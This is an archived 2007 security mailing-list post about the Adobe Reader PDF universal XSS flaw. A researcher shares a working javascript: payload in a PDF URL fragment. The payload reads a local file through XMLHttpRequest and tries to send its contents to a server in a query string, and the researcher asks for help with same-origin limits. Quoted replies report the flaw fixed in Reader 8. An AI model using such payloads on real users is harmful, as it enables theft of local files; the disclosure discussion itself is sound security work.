[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[WEB SECURITY] Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
- From: "T Biehn" <tbiehn@xxxxxxxxx>
- Subject: [WEB SECURITY] Re: [Full-disclosure] Universal XSS with PDF files: highly dangerous
- Date: Thu, 4 Jan 2007 10:10:49 -0500
------=_Part_6193_14239050.1167923449386
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
I'm trying to put together a demonstration of this vulnerability, and how it
could effect corporate security, however I'm encountering a large hangup
when sending a file 'back' to the webserver, the browser same origin policy
denies me the ability to send files to a different domain, which afaik is
necessary for an external attacker to properly exploit this vulnerability:
Here's the code I have so far, based more or less on PDP's
Vanilla, almost' PDP's (different url, spaces removed etc.)
file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4)alert(
xhr.responseText);};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat
6.0/ReadMe.htm', true);xhr.send(null);
What I'm trying to do:
file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 =
cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(
xhr.responseText);xhr2.open('GET', '
http://localhost:80/whatever.htm?content=' +
xhr.responseText);xhr2.onreadystatechage
= function(){alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET',
'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);xhr.send(null);
Now, one would think that the LOCAL file operating mode of IE would allow
the cross domain XHR request, however this does not work (tested IE 6) I
think because by default IE disallows Javascript access on the local
context.
Try putting this is IE:
file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol')
;
and then try it in FireFox
It won't work in IE 6, but it executes just fine in FireFox.
function cXHR(){ //Grabs a legit XHR.
try{
return new ActiveXObject('Msxml2.XMLHTTP');
}catch(e){}
try{
return new ActiveXObject('Microsoft.XMLHTTP');
}catch(e){}
try{
return new XMLHttpRequest();
}catch(e){}
return null;
}
var xhr = cXHR(); //For grabbing
var xhr2 = cXHR(); //For sending
xhr.onreadystatechange = function(){
if (xhr.readyState == 4){
alert(xhr.responseText);
xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' +
xhr.responseText); //Send it up, yo.
xhr2.onreadystatechage = function(){
alert('File Transferred!');
};
xhr2.send(null);
}
};
xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);
xhr.send(null);
Anyone's input on this matter would be appreciated.
On 1/4/07, Juha-Matti Laurio <juha-matti.laurio@netti.fi> wrote:
>
> Additionally, the public PoC doesn't work on Preview version 3.0.8 (409)
> on OS X 10.4.8.
>
> - Juha-Matti
>
> Larry Seltzer <Larry@larryseltzer.com> wrote:
> > >>"According to public reports, this vulnerability is addressed in Adobe
> > Acrobat Reader 8.0."
> >
> > I've actually tested it. On Reader 8 Acrobat you get a messagebox that
> > says "This operation is not allowed"
> >
> > Larry Seltzer
> > eWEEK.com Security Center Editor
> > http://security.eweek.com/
> > http://blog.eweek.com/blogs/larry%5Fseltzer/
> > Contributing Editor, PC Magazine
> > larryseltzer@ziffdavis.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
------=_Part_6193_14239050.1167923449386
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
I'm trying to put together a demonstration of this vulnerability, and how it could effect corporate security, however I'm encountering a large hangup when sending a file 'back' to the webserver, the browser same origin policy denies me the ability to send files to a different domain, which afaik is necessary for an external attacker to properly exploit this vulnerability:
<br><br>Here's the code I have so far, based more or less on PDP's<br><br>Vanilla, almost' PDP's (different url, spaces removed etc.)<br><a href="file:///C:/Program">file:///C:/Program</a> Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if (
xhr.readyState == 4)alert(xhr.responseText);};xhr.open('GET', '<a href="file:///C:/Program">file:///C:/Program</a> Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);<br><br>What I'm trying to do:
<br><a href="file:///C:/Program">file:///C:/Program</a> Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('
Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(xhr.responseText);xhr2.open('GET', '
<a href="http://localhost:80/whatever.htm?content=";>http://localhost:80/whatever.htm?content=</a>' + xhr.responseText);xhr2.onreadystatechage = function(){alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET', '
<a href="file:///C:/Program">file:///C:/Program</a> Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);<br><br>Now, one would think that the LOCAL file operating mode of IE would allow the cross domain XHR request, however this does not work (tested IE 6) I think because by default IE disallows Javascript access on the local context.
<br><br>Try putting this is IE: <a href="file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol')">file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol')
</a>;<br>and then try it in FireFox<br><br>It won't work in IE 6, but it executes just fine in FireFox.<br><br>function cXHR(){ //Grabs a legit XHR.<br> try{<br> return new ActiveXObject('Msxml2.XMLHTTP');
<br> }catch(e){}<br> try{<br> return new ActiveXObject('Microsoft.XMLHTTP');<br> }catch(e){}<br> try{<br> return new XMLHttpRequest();<br> }catch(e){} <br> return null;<br>}<br>var xhr = cXHR(); //For grabbing
<br>var xhr2 = cXHR(); //For sending<br>xhr.onreadystatechange = function(){<br> if (xhr.readyState == 4){<br> alert(xhr.responseText);<br> xhr2.open('GET', '<a href="http://localhost:80/whatever.htm?content=";>
http://localhost:80/whatever.htm?content=</a>' + xhr.responseText); //Send it up, yo.<br> xhr2.onreadystatechage = function(){<br> alert('File Transferred!');<br> };<br> xhr2.send
(null);<br> }<br>};<br>xhr.open('GET', '<a href="file:///C:/Program">file:///C:/Program</a> Files/Adobe/Acrobat 6.0/ReadMe.htm', true);<br>xhr.send(null);<br><br>Anyone's input on this matter would be appreciated.
<br><br><div><span class="gmail_quote">On 1/4/07, <b class="gmail_sendername">Juha-Matti Laurio</b> <<a href="mailto:juha-matti.laurio@netti.fi";>juha-matti.laurio@netti.fi</a>> wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS X 10.4.8.<br><br>- Juha-Matti<br><br>Larry Seltzer <<a href="mailto:Larry@larryseltzer.com";>Larry@larryseltzer.com</a>> wrote:<br>> >>"According to public reports, this vulnerability is addressed in Adobe
<br>> Acrobat Reader 8.0."<br>><br>> I've actually tested it. On Reader 8 Acrobat you get a messagebox that<br>> says "This operation is not allowed"<br>><br>> Larry Seltzer<br>> eWEEK.com
Security Center Editor<br>> <a href="http://security.eweek.com/";>http://security.eweek.com/</a><br>> <a href="http://blog.eweek.com/blogs/larry%5Fseltzer/";>http://blog.eweek.com/blogs/larry%5Fseltzer/</a><br>> Contributing Editor, PC Magazine
<br>> <a href="mailto:larryseltzer@ziffdavis.com";>larryseltzer@ziffdavis.com</a><br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html";>
http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/";>http://secunia.com/</a><br></blockquote></div><br>
------=_Part_6193_14239050.1167923449386--
Brought to you by http://www.webappsec.org
Search this site
|